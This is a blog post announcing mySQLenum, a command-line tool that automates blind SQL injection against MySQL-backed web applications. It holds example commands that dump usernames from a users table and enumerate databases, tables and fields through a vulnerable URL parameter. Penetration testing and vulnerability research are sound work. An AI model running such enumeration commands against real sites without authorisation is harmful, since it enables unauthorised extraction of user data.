
mySQLenum – Automatic blind sql injection tool

June 1, 2010

mySQLenum is a command-line automatic blind SQL injection tool for web applications that use a MySQL server as their back end. Its main goal is to provide an easy-to-use command-line interface.

It is coded in pure C, does not depend on any external library, is fast, and supports all MySQL versions.

It is easy and simple to use; web application developers who use a database can simply run this tool to find known vulnerabilities.


Five necessary parameters:

--url: target URL
--sql-query: SQL query to execute (or --macro to enter Macro mode)
--param: vulnerable parameter
--param-value: a valid value to assign to the parameter
--match-string: string to match in the page content when the query is valid

How to use mySQLenum

mysqlenum --url="http://www.oneexample.com/page.php" --sql-query="select username from users" --param=page_id --param-value=1 --match-string="Articolo 22" --http-auth="user:P4ssw0rd"

Query: select username from users

1) root
2) local
3) marco
4) luca
5) —

> Total requests: 192
> Data sent: 40 Kb
> Data received: 862 Kb

When only the five parameters above are provided, it automatically assumes:

- the request type is GET
- the webserver port is 80
- the charset used during the enumeration is between the ASCII values 32 and 122

We can use the CONCAT function to enumerate more fields with only one query:

One more macro mode example.

In interactive Macro mode it is possible to automatically enumerate:

- all available databases
- all tables of a specific database
- all fields of a specific table

Macro mode requires that INFORMATION_SCHEMA is accessible.

mysqlenum --url="http://www.example.com/page.php" --macro --param=page_id --param-value=1 --match-string="Articolo 22"

Available macros:
1) Databases enumeration
2) Tables enumeration
3) Fields enumeration

Your choice: X

Databases:
1) information_schema
2) site
3) —

> Total requests: 227
> Data sent: 62 Kb
> Data received: 1066 Kb

Supported operating systems

*nix Systems

Posted by r00t3er at 6:43 pm
